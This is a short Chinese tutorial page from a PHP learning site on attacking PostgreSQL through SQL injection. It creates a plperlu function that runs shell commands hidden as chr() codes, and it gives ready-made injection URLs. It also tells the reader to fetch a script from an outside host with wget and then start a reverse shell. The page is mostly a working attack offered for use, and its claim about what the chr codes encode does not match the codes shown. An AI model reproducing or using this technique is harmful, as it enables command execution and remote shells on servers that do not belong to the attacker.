来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),FD);$aaa$ LANGUAGE plperlu;select id();id()为创建函数名,可以自定义随便写chr(10......
|
CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;
select id();
id()为创建函数名,可以自定义随便写
chr(108).chr(105)是需要执行的命令id的asc编码
自己把需要执行的命令换成chr替换就行了,具体就是wget http://les.la/c.pl -O /tmp/c.pl
删除函数为drop function id(); 然后再执行此反弹shell的命令
此大法可对付一切8.0以上的版本(含8.0)
以下为实际注入时的表现形式
xxx.php?id=10;CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;--
xxx.php?id=10 and 1=2 union select null,null,null,id(),null,null,null,null--
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
